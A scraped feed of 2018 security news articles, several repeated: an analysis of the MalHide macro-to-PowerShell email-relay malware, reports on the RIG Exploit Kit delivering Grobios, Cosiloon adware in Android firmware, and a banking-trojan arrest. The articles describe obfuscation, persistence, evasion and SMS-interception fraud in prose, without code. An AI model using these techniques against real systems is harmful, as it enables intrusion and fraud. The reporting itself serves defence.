The cybersecurity experts Marco Ramilli analyzed a new sample of malware dubbed MalHide that implements a quite new attack path to use the compromised system as eMail relay in order to hide the attacker networks.

Today I’d like to share an interesting (at least to me) analysis on a given sample. I have called this sample MalHide but you will see “why” only at the end of my post :D. I believe this is a quite interesting Malware because it firstly implements several obfuscation stages by using different obfuscation techniques and secondly it implements a quite new attack path (not new per-se but new on opportunistic malware families) where the attacker doesn’t want to steal information and/or compromise a system for possession and/or destruction but the attacker uses the compromised system as eMail relay in order to hide the attacker networks. It is amazing to figure out that attackers are primary moving on fraud direction. For example, having a successful privilege access on the victim machine, the attacker might decide to perform several malicious actions, but among all the choices, he decides to spawn an SMTP relay to send anonymously fraud emails. Based on my past experience this is quite wired, isn’t it ?!
Disclaimer: I’m not going into details on every step since I’m not writing a tutorial but mostly I’d like to prove that threats are getting more and more complex on relatively short time and that attack path is quite unique at least for my personal experience.
Everything started with an email attachment. “Nuovo Documento.doc” is its name and it is able to bypass every single AntiSpam and AntiMalware engine the target had. The following image shows the initial stage where the “.DOC” file seems to be benign but not compatible with the running Microsoft Word instance.
MalHide Sample as it looks like on opening. Stage 1
The sample presents some macro functions on it. Many junk functions have been injected on the VBA side in order to make life harder to reverse engineers, but fortunately, the great Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled by code. It took almost 3 seconds to figure out it was a malicious code. The following image shows the Microsoft VBA Editor debugging view where is possible to appreciate the variable qZbTUw containing a PowerShell encoded code. Here we are! The second stage is approaching the victim.
Stage 2. A running instance of PowerShell invoked by VBA
The PowerShell code was Base64 Encoded and additionally obfuscated through “variable mess”. This technique is quite common for  javascript devs since the code they develop runs on client side and obfuscating code is used technique to protect (sort of) the written code, but on the given scenario it looks like a simple implementation of FileLess Staging, where the attacker runs a PowerShell script directly from memory without saving it on HD, in such a way the victim does not need to enable the “running PowerShell from file” Microsoft register key and it’s much harder from AntiVirus detect the infection stage. Then the script fires it on following the infection. Powershell ISE helps us to reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to dropping URLs. I know, it’s almost impossible to see the images since they look like small, but please click on them to make a bigger view,  if you wish.
Stage 3. Decoding Powershell Drop-and-Execute
Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to IoC section)! The executed actions are quite standard. From an array of dropping website lets cycle over them and take the one who drops! The cycling policy could differ from sample to sample since they could use a pseudo-random seed generator or adopting an increment rotation or a round robin rotation and son. For this analysis is not interesting cycling policy at all since we decoded all the possible dropping files. The Powershell command gets the 52887.exe from an external source (dropping websites) and places it on C:\Users\Public\52887.exe. Finally, it runs it. Stage 4 has began, a new PE sample has been executed. The following image shows the Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately, this stage drops the code from itself without getting on the network side. The fonduewwa.exe is then executed.
Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
The new stage (Stage 4) performs the following steps:
1) It fires up services which act as SMTP client.
2) Connects to a Command and Control which provides emails addresses, SMTP relays, and eMails body to be sent.
3) Sends eMail to exploit BeC communications.
The following images show the Command and Control address. The first image shows the used Windows API while the second one addresses the opened connections directly on the infected machine.
Command and Control IP Address (click to make it bigger)
Command and Control DNS resolution (click to make it bigger)
The Command and Control (c2) listen to: c-67-176-238-209.hsd1.il.comcast.net which today resolves in: 67.176.238.209. The C2 seems to answers to http queries having a specific set of cookies as the following image shows. The C2 crafted and rebuilt communication, made possible by reconstructing cookies from sniffed internal communications, gets back from C2 a kB of encoded data.
Command and Control Communication through HTTP

From C2 comes actions, victims addresses, SMTP servers, and passwords. The sample connects to a given SMTP relays, it authenticates itself and sends email to the victims. The following images prove that the attackers have plenty of credentials to SMTP relays around the globe.

MalHide Connection to real SMTP relays
As now I will not disclose Username e Password for getting access to SMTP relays, but if you can prove to be the owner (or at least to be working for the company owning) of one of them let’s have a chat on that, many interesting things are happening into your network. The emails sent from the analyzed sample are targeting specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BeC (or CEO Scam) to specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT.Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very  small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone.”

Following few examples of the sent emails coming from C2 and delivering through the analyzed MalHide sample.

Here we are, another email has been sent, another Malware has been thought and developed, another analysis I’ve been made but this time it looks like the “Malware economy” is seriously moving to fraud, there is much money respect to information stealing which is an ancient and romantic way to attack victims. Is this attack a significative example expressing the will of the new underground economy? Is this attack a small and silent change of paradigm, where previously the attacker was interested in your data in order to sell them but now he gets more interested on fraud third parties (such as companies) through you? I do not have such answer here.

Ok, now it’s time to explain why I called this Malware MalHide. Well, it’s a complex Malware, it hides several times BUT most important it has been developed to hide the attacker from sending emails in a way that is not possible to trace back the Attacker IP from the attack path. So I believe MalHide would be a nice name 😀

Further details on the MalHide malware, including the IoCs are reported in the original analysis published by Marco Ramilli

https://marcoramilli.blogspot.it/2018/05/malhide-interesting-malware-sample.html

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MalHide, malware)

The post MalHide Malware uses the compromised system as an eMail relay appeared first on Security Affairs.

Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan

Security experts highlighted several times the decline of the exploit kit activity after the disappearance of the Angler and Nuclear exploit kits in 2016.

Anyway, researchers at FireEye periodically observe significant developments in this space and recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK).

The RIG Exploit Kit has been recently involved in the distribution of the Grobios Trojan, in the following image is reported the infection chain.

RIG Exploit Kit Grobios campaign

“We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it.” reads the analysis published by FireEye. 

“The iframe loads a malvertisement domain, which communicates over SSL and leads to the RIG EK landing page that loads the malicious Flash file”. “When opened, the Flash file drops the Grobios Trojan.”

Malware researchers said the Grobios Trojan implements several evasion techniques and uses various persistence mechanisms to make hard for victims to uninstall the threat. The malware implements the following techniques to gain persistence:

  • It delivers a copy of itself into the %APPDATA% folder (i.e. %APPDATA%\Google\v2.1.13554\<RandomName>.exe.), masquerading as a version of legitimate application installed on the target system. It creates an Autorun registry key and a shortcut in the Windows Startup folder.
  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%, masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.

The malware also uses multiple anti-debugging, anti-analysis and anti-VM techniques to evade the detection.

Once completed a series of checks to detect the VM and malware analysis environment, the Grobios Trojan connects to the command and control (C2) server to receive commands.

“In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx.” continues the analysis.

“The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash.  The malware also uses stack strings.”

Once infected the system, the malware also creates two scheduled tasks.

Experts highlighted that the malware protects its copy in the %TEMP% folder with (Windows Encrypted File System) EFS.

The analysis of the code also revealed the presence of two hardcoded obfuscated C2s.

“Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.” concluded FireEye.

Further details including the IoCs for the threat are available in the report.

Pierluigi Paganini

(Security Affairs – RIG Exploit Kit , Grobios Trojan)

The post Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan appeared first on Security Affairs.

Security Affairs: Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan

Security experts highlighted several times the decline of the exploit kit activity after the disappearance of the Angler and Nuclear exploit kits in 2016.

Anyway, researchers at FireEye periodically observe significant developments in this space and recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK).

The RIG Exploit Kit has been recently involved in the distribution of the Grobios Trojan, in the following image is reported the infection chain.

RIG Exploit Kit Grobios campaign

“We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it.” reads the analysis published by FireEye. 

“The iframe loads a malvertisement domain, which communicates over SSL and leads to the RIG EK landing page that loads the malicious Flash file”. “When opened, the Flash file drops the Grobios Trojan.”

Malware researchers said the Grobios Trojan implements several evasion techniques and uses various persistence mechanisms to make hard for victims to uninstall the threat. The malware implements the following techniques to gain persistence:

  • It delivers a copy of itself into the %APPDATA% folder (i.e. %APPDATA%\Google\v2.1.13554\<RandomName>.exe.), masquerading as a version of legitimate application installed on the target system. It creates an Autorun registry key and a shortcut in the Windows Startup folder.
  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%, masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.

The malware also uses multiple anti-debugging, anti-analysis and anti-VM techniques to evade the detection.

Once completed a series of checks to detect the VM and malware analysis environment, the Grobios Trojan connects to the command and control (C2) server to receive commands.

“In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx.” continues the analysis.

“The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash.  The malware also uses stack strings.”

Once infected the system, the malware also creates two scheduled tasks.

Experts highlighted that the malware protects its copy in the %TEMP% folder with (Windows Encrypted File System) EFS.

The analysis of the code also revealed the presence of two hardcoded obfuscated C2s.

“Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.” concluded FireEye.

Further details including the IoCs for the threat are available in the report.

Pierluigi Paganini

(Security Affairs – RIG Exploit Kit , Grobios Trojan)

The post Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan appeared first on Security Affairs.



Security Affairs

Security Affairs: Security Affairs newsletter Round 164 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Experts propose a new variation of the Spectre attack to recover data from System Management Mode
·      Misconfigured CalAmp server allowed hacker to take over a lot of vehicles
·      Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
·      Hacked Drupal sites involved in mining campaigns, RATs distributions, scams
·      Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
·      Judges convict crook of operating Scan4You Counter Antivirus Service
·      Roaming Mantis gang evolves and broadens its operations
·      North Korea-linked Sun Team APT group targets deflectors with Android Malware
·      Tech giants are all working on new Spectre and Meltdown attacks, so-called variant 3 and variant 4
·      The ZipperDown Vulnerability could affect roughly 10% of iOS Apps
·      TheMoon botnet is now leveraging a zero-day to target GPON routers
·      Chinese researchers from Tencent discovered exploitable flaws in several BMW models
·      Experts warn: it is too easy to steal WiFi access key from TalkTalk ‘s Super Routers
·      Huge Russia-Linked botnet VPNFilter ready to launch a massive attack on Ukraine
·      Turla APT group leverages for the first time the Metasploit framework for the Mosquito campaign
·      Bitcoin Gold hit by double-spend attack, exchanges lose over $18 million
·      Justice Department announces actions to disrupt the VPNFilter botnet
·      Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
·      Many users reported in the past few weeks their Macs have been infected with a new Monero Miner
·      Xenotime, Threat actors Behind Triton Malware broadens its activities
·      Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
·      More than 100 Million IoT devices potentially exposed to Z-Shave Z-Wave attack
·      Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware
·      CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
·      Experts show how to defeat AMDs Secure Encrypted Virtualization
·      Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 164 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 164 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Experts propose a new variation of the Spectre attack to recover data from System Management Mode
·      Misconfigured CalAmp server allowed hacker to take over a lot of vehicles
·      Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
·      Hacked Drupal sites involved in mining campaigns, RATs distributions, scams
·      Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
·      Judges convict crook of operating Scan4You Counter Antivirus Service
·      Roaming Mantis gang evolves and broadens its operations
·      North Korea-linked Sun Team APT group targets deflectors with Android Malware
·      Tech giants are all working on new Spectre and Meltdown attacks, so-called variant 3 and variant 4
·      The ZipperDown Vulnerability could affect roughly 10% of iOS Apps
·      TheMoon botnet is now leveraging a zero-day to target GPON routers
·      Chinese researchers from Tencent discovered exploitable flaws in several BMW models
·      Experts warn: it is too easy to steal WiFi access key from TalkTalk ‘s Super Routers
·      Huge Russia-Linked botnet VPNFilter ready to launch a massive attack on Ukraine
·      Turla APT group leverages for the first time the Metasploit framework for the Mosquito campaign
·      Bitcoin Gold hit by double-spend attack, exchanges lose over $18 million
·      Justice Department announces actions to disrupt the VPNFilter botnet
·      Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
·      Many users reported in the past few weeks their Macs have been infected with a new Monero Miner
·      Xenotime, Threat actors Behind Triton Malware broadens its activities
·      Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
·      More than 100 Million IoT devices potentially exposed to Z-Shave Z-Wave attack
·      Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware
·      CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
·      Experts show how to defeat AMDs Secure Encrypted Virtualization
·      Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 164 – News of the week appeared first on Security Affairs.

Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Researchers from Avast the antivirus firm are investigating the discovery of pre-installed malware found in 141 low-cost Android devices in over 90 countries.

Security experts from Antivirus firm Avast have discovered a new case of pre-installed malware on low-cost Android devices, crooks injected the malicious code in the firmware of 141 models.

The operation is linked to the discovery made in December 2016 by researchers at antivirus firm Dr. Web, when the experts reported a crime gang that had compromised the supply-chain of several mobile carriers, infecting mobile devices with malware.

In 2016, the malware infected the firmware of at least 26 low-cost Android smartphone and tablets models. The firmware of a large number of popular Android devices operating on the MediaTek platform was compromised with at least two types of downloader Trojans.

Both malware found in low-cost Android mobile devices, detected as Android.DownLoader.473.origin and Android.Sprovider.7  were able to collect users’ data, displays advertisements on top of running applications and downloads unwanted apps. These low-cost Android smartphones and tablets were mostly marketed in Russia.

Back in the present, Avast experts believe the same criminal gang is still active and is continuing the same operation by compromising the firmware of many other devices by injecting a malware dubbed Cosiloon.

The researchers discovered infected devices in over 90 countries, and all of them use a Mediatek chipset, but MediaTek is not the root cause of the infections because only the firmware for some devices from an affected smartphone model is tainted with malware. This means that attackers did not compromise the MediaTek firmware components.

“The adware we analyzed has previously been described by Dr. Web and goes by the name “Cosiloon.” As can be seen in the screenshots below, the adware creates an overlay to display an ad over a webpage within the users’ browser. The adware has been active for at least three years, and is difficult to remove as it is installed on the firmware level and uses strong obfuscation.” reads the analysis published by Avast.

“Thousands of users are affected, and in the past month alone we have seen the latest version of the adware on around 18,000 devices belonging to Avast users located in more than 100 countries including Russia, Italy, Germany, the UK, as well as some users in the U.S.”

Avast published a list of over 140 Android smartphones and tablets on which it says it found the group’s malware —which they named Cosiloon.

The Cosiloon malware is the same that was spotted in 2015 by Dr. Web and according to the experts it hasn’t received any updates.

The malware is composed of two separate APKs,  the dropper, and the payload. In the older versions of the malware, the experts noticed a separate adware app pre-installed in the /system partition, in most recent variants the researchers found a new dropped payload.

“A second variant of the dropper is a bit more interesting. The code is pretty much the same as the first variant, but it is not a separate system application. The code is embedded in SystemUI.apk, an integral part of the Android OS. This makes the dropper pretty much impossible to remove by the user.” continues the analysis.

The dropper runs from the “/system” folder with full root privileges, it downloads an XML file from a remote server and then installs other malicious apps.

In almost any infection, the malicious codes were used to display ads on top of mobile apps or the Android OS interface.

Cosiloon pre-installed malware

The experts noticed the pre-installed malware doesn’t drop any malicious app if the device language is set to Chinese, when the device’s public IP address is also from a Chinese IP range, and when the number of installed apps is below three (a circumstance that could indicate that the malware is running in a test environment).

Avast researchers confirmed that the infection point is still a mystery due to the large number of vendors involved, the detection of the dropper in very complicated as explained in the analysis.

“Detecting the dropper is further complicated by the fact that it is a system app, part of the devices’ read-only firmware, which is integrated in the device shipped from the factory.” continues the analysis.

“Also, it is likely odexed in most firmwares, meaning the app’s code was removed from the original APK file, optimized and stored separately during the firmware’s build process. As a result, cybersecurity firms are likely missing many of the dropper samples and have to rely on the payload for detection and statistics.”

Experts believe the attackers are opportunistic and target in some way the supply chain at random, every time they have the possibility to compromise the firmware of the vendors.

The control server was up until April 2018, crooks have produced new payloads over the time while new devices were shipped by several manufacturers with the pre-installed dropper.

The experts have attempted to disable Cosiloon’s C&C server by sending takedown requests to the domain registrar and server providers. While the ZenLayer provider quickly shut down the server, but crooks moved their activities to another provider that did not respond to Avast’s request.

“Avast Mobile Security can detect and uninstall the payload, but it cannot acquire the permissions required to disable the dropper, so Google Play Protect has to do the heavy lifting.” concluded Avast.

“If your device is infected, it should automatically disable both the dropper and the payload. We know this works because we have observed a drop in the number of devices infected by new payload versions after Play Protect started detecting Cosiloon.”

Further details, including IoCs for the Cosiloon pre-installed malware are reported in the Avast analysis.

Pierluigi Paganini

(Security Affairs – pre-installed malware, Cosiloon malware)

The post Pre-installed malware found in 141 low-cost Android devices in over 90 countries appeared first on Security Affairs.

Security Affairs: Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Researchers from Avast the antivirus firm are investigating the discovery of pre-installed malware found in 141 low-cost Android devices in over 90 countries.

Security experts from Antivirus firm Avast have discovered a new case of pre-installed malware on low-cost Android devices, crooks injected the malicious code in the firmware of 141 models.

The operation is linked to the discovery made in December 2016 by researchers at antivirus firm Dr. Web, when the experts reported a crime gang that had compromised the supply-chain of several mobile carriers, infecting mobile devices with malware.

In 2016, the malware infected the firmware of at least 26 low-cost Android smartphone and tablets models. The firmware of a large number of popular Android devices operating on the MediaTek platform was compromised with at least two types of downloader Trojans.

Both malware found in low-cost Android mobile devices, detected as Android.DownLoader.473.origin and Android.Sprovider.7  were able to collect users’ data, displays advertisements on top of running applications and downloads unwanted apps. These low-cost Android smartphones and tablets were mostly marketed in Russia.

Back in the present, Avast experts believe the same criminal gang is still active and is continuing the same operation by compromising the firmware of many other devices by injecting a malware dubbed Cosiloon.

The researchers discovered infected devices in over 90 countries, and all of them use a Mediatek chipset, but MediaTek is not the root cause of the infections because only the firmware for some devices from an affected smartphone model is tainted with malware. This means that attackers did not compromise the MediaTek firmware components.

“The adware we analyzed has previously been described by Dr. Web and goes by the name “Cosiloon.” As can be seen in the screenshots below, the adware creates an overlay to display an ad over a webpage within the users’ browser. The adware has been active for at least three years, and is difficult to remove as it is installed on the firmware level and uses strong obfuscation.” reads the analysis published by Avast.

“Thousands of users are affected, and in the past month alone we have seen the latest version of the adware on around 18,000 devices belonging to Avast users located in more than 100 countries including Russia, Italy, Germany, the UK, as well as some users in the U.S.”

Avast published a list of over 140 Android smartphones and tablets on which it says it found the group’s malware —which they named Cosiloon.

The Cosiloon malware is the same that was spotted in 2015 by Dr. Web and according to the experts it hasn’t received any updates.

The malware is composed of two separate APKs,  the dropper, and the payload. In the older versions of the malware, the experts noticed a separate adware app pre-installed in the /system partition, in most recent variants the researchers found a new dropped payload.

“A second variant of the dropper is a bit more interesting. The code is pretty much the same as the first variant, but it is not a separate system application. The code is embedded in SystemUI.apk, an integral part of the Android OS. This makes the dropper pretty much impossible to remove by the user.” continues the analysis.

The dropper runs from the “/system” folder with full root privileges, it downloads an XML file from a remote server and then installs other malicious apps.

In almost any infection, the malicious codes were used to display ads on top of mobile apps or the Android OS interface.

Cosiloon pre-installed malware

The experts noticed the pre-installed malware doesn’t drop any malicious app if the device language is set to Chinese, when the device’s public IP address is also from a Chinese IP range, and when the number of installed apps is below three (a circumstance that could indicate that the malware is running in a test environment).

Avast researchers confirmed that the infection point is still a mystery due to the large number of vendors involved, the detection of the dropper in very complicated as explained in the analysis.

“Detecting the dropper is further complicated by the fact that it is a system app, part of the devices’ read-only firmware, which is integrated in the device shipped from the factory.” continues the analysis.

“Also, it is likely odexed in most firmwares, meaning the app’s code was removed from the original APK file, optimized and stored separately during the firmware’s build process. As a result, cybersecurity firms are likely missing many of the dropper samples and have to rely on the payload for detection and statistics.”

Experts believe the attackers are opportunistic and target in some way the supply chain at random, every time they have the possibility to compromise the firmware of the vendors.

The control server was up until April 2018, crooks have produced new payloads over the time while new devices were shipped by several manufacturers with the pre-installed dropper.

The experts have attempted to disable Cosiloon’s C&C server by sending takedown requests to the domain registrar and server providers. While the ZenLayer provider quickly shut down the server, but crooks moved their activities to another provider that did not respond to Avast’s request.

“Avast Mobile Security can detect and uninstall the payload, but it cannot acquire the permissions required to disable the dropper, so Google Play Protect has to do the heavy lifting.” concluded Avast.

“If your device is infected, it should automatically disable both the dropper and the payload. We know this works because we have observed a drop in the number of devices infected by new payload versions after Play Protect started detecting Cosiloon.”

Further details, including IoCs for the Cosiloon pre-installed malware are reported in the Avast analysis.

Pierluigi Paganini

(Security Affairs – pre-installed malware, Cosiloon malware)

The post Pre-installed malware found in 141 low-cost Android devices in over 90 countries appeared first on Security Affairs.



Security Affairs

Europol Signs Cybersecurity Agreement With EU Agencies, WEF

Europol this week signed two memorandums of understanding related to cybersecurity cooperation – one with the World Economic Forum (WEF) and one with the European Union Agency for Network and Information Security (ENISA), the European Defence Agency (EDA), and the EU’s Computer Emergency Response Team (CERT-EU).

read more

Fraud data shows 680% spike in fraudulent mobile app transactions

The number of fraudulent transactions originating from a mobile app during the first quarter has increased by 200 per cent since 2015, according to RSA Security. Analysis from the team also indicated that abuse of social media platforms is a growing problem, with social media replacing the dark web as the top hacker marketplace. Key stats ‘Appy hunting – The proportion of fraudulent transactions carried out on a mobile app has jumped from just 5 … More

The post Fraud data shows 680% spike in fraudulent mobile app transactions appeared first on Help Net Security.

1 in 10 healthcare organizations paid a ransom within the last year

More than one in three healthcare organizations have suffered a cyberattack within the last year, while almost one in 10 have paid a ransom or extortion fee, according to Imperva. Healthcare data is extremely valuable on the dark web as it contains highly sensitive data, both financial and protected health information. As a result, healthcare organizations are increasingly attractive to attackers. Additionally, with the introduction of web-based healthcare portals and remote patient mobile technology, managing … More

The post 1 in 10 healthcare organizations paid a ransom within the last year appeared first on Help Net Security.

Security Affairs: Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware

Moscow, May 24, 2018 – law enforcement, with support from Group-IB, has arrested a 32-year-old hacker, accused of stealing funds from Russian banks’ customers using Android mobile malware.

At the height of their activity, victims reportedly lost between 1,500 to 8,000 dollars daily and levered cryptocurrency for laundering.

Group-IB’s analysis reviewed the tools and techniques leveraged in the group’s attack revealing that the gang tricked customers of Russian banks into downloading malicious mobile applications “Banks at your fingertips”. The app claimed to be an aggregator of the country’s leading mobile banking systems and promised users a ‘one-click’ access to all bank cards to view balances, transfer money from card to card, and pay for online services. The app was first discovered in 2016 and was distributed through spam emails.

The criminal group’s approach was rather elementary: customers of banks downloaded the fake mobile app and entered their card details. The Trojan then sent bank card data or online banking credentials to the C&C server. Following this, the threat actor transferred 200-500 dollars at a time to previously activated bank accounts, and bypassed SMS confirmation codes which were intercepted from the victim’s phone. The victims were not aware of the transactions as all SMS confirmations of transactions were blocked.

The investigation by authorities identified a member of the criminal group, who was responsible for transferring money from user accounts to attacker’s cards, a 32-year-old unemployed Russian national who had previous convictions connected to arms trafficking. During the suspect’s arrest in May 2018, authorities identified SIM cards and fraudulent bank cards to which stolen funds were transferred. The suspect has confessed to his actions and the investigation/ prosecution continues.

mobile malware

Seems, we need to keep our mobiles safe. Well, this is not the first case of stealing. We’ve seen many cases in the past too. One of the cases happened on March 2018 – in which a malware campaign that attempted to install a resource-draining currency miner on more than 400,000 computers in 12 hours was caused by a malicious backdoor that was sneaked into a BitTorrent application called Mediaget, a Microsoft researcher said. Researchers called it a supply-chain attack, which aims to infect large numbers of people by compromising a popular piece of hardware or software.

Many people have a question about torrenting. Millions of the people don’t know whether torrenting is legal or illegal. Well, torrenting carries risks. Authorities will catch and punish you if you torrent copyright material. Also, there is a risk of downloading infected files. All you need is the best tool or any software that will keep you safe from this kind of threats.

I have reached Sergey Lupanin, Head of cyber investigation department, Group-IB for a comment:

“Actually this trojan is quite simple and private, means there is no any descriptions or screenshots on Dark-web forums. And it’s early versions didn’t interact with any mobile banks services. Users entered their card data and permitted this application to work with SMS-messages.

Trojan used https protocol with a self-signed certificate to work with C2 servers and sent user’s card data to the actor. The actor entered this data (which included card number, cvv code, expiration date, and owner name) to card2card service. User received SMS with transaction authorization code, that was intercepted by this application and sent to Actor for transaction approval. And that’s it. Later this trojan received addition functionality – ability to work with mobile banks via SMS, thus not requiring from Threat actor to use any Card2Card service.”

About the author: Group-IB

Original post availale here

Pierluigi Paganini

(Security Affairs – mobile malware, cybercrime)

The post Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware appeared first on Security Affairs.



Security Affairs

Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware

Moscow, May 24, 2018 – law enforcement, with support from Group-IB, has arrested a 32-year-old hacker, accused of stealing funds from Russian banks’ customers using Android mobile malware.

At the height of their activity, victims reportedly lost between 1,500 to 8,000 dollars daily and levered cryptocurrency for laundering.

Group-IB’s analysis reviewed the tools and techniques leveraged in the group’s attack revealing that the gang tricked customers of Russian banks into downloading malicious mobile applications “Banks at your fingertips”. The app claimed to be an aggregator of the country’s leading mobile banking systems and promised users a ‘one-click’ access to all bank cards to view balances, transfer money from card to card, and pay for online services. The app was first discovered in 2016 and was distributed through spam emails.

The criminal group’s approach was rather elementary: customers of banks downloaded the fake mobile app and entered their card details. The Trojan then sent bank card data or online banking credentials to the C&C server. Following this, the threat actor transferred 200-500 dollars at a time to previously activated bank accounts, and bypassed SMS confirmation codes which were intercepted from the victim’s phone. The victims were not aware of the transactions as all SMS confirmations of transactions were blocked.

The investigation by authorities identified a member of the criminal group, who was responsible for transferring money from user accounts to attacker’s cards, a 32-year-old unemployed Russian national who had previous convictions connected to arms trafficking. During the suspect’s arrest in May 2018, authorities identified SIM cards and fraudulent bank cards to which stolen funds were transferred. The suspect has confessed to his actions and the investigation/ prosecution continues.

mobile malware

Seems, we need to keep our mobiles safe. Well, this is not the first case of stealing. We’ve seen many cases in the past too. One of the cases happened on March 2018 – in which a malware campaign that attempted to install a resource-draining currency miner on more than 400,000 computers in 12 hours was caused by a malicious backdoor that was sneaked into a BitTorrent application called Mediaget, a Microsoft researcher said. Researchers called it a supply-chain attack, which aims to infect large numbers of people by compromising a popular piece of hardware or software.

Many people have a question about torrenting. Millions of the people don’t know whether torrenting is legal or illegal. Well, torrenting carries risks. Authorities will catch and punish you if you torrent copyright material. Also, there is a risk of downloading infected files. All you need is the best tool or any software that will keep you safe from this kind of threats.

I have reached Sergey Lupanin, Head of cyber investigation department, Group-IB for a comment:

“Actually this trojan is quite simple and private, means there is no any descriptions or screenshots on Dark-web forums. And it’s early versions didn’t interact with any mobile banks services. Users entered their card data and permitted this application to work with SMS-messages.

Trojan used https protocol with a self-signed certificate to work with C2 servers and sent user’s card data to the actor. The actor entered this data (which included card number, cvv code, expiration date, and owner name) to card2card service. User received SMS with transaction authorization code, that was intercepted by this application and sent to Actor for transaction approval. And that’s it. Later this trojan received addition functionality – ability to work with mobile banks via SMS, thus not requiring from Threat actor to use any Card2Card service.”

About the author: Group-IB

Original post availale here

Pierluigi Paganini

(Security Affairs – mobile malware, cybercrime)

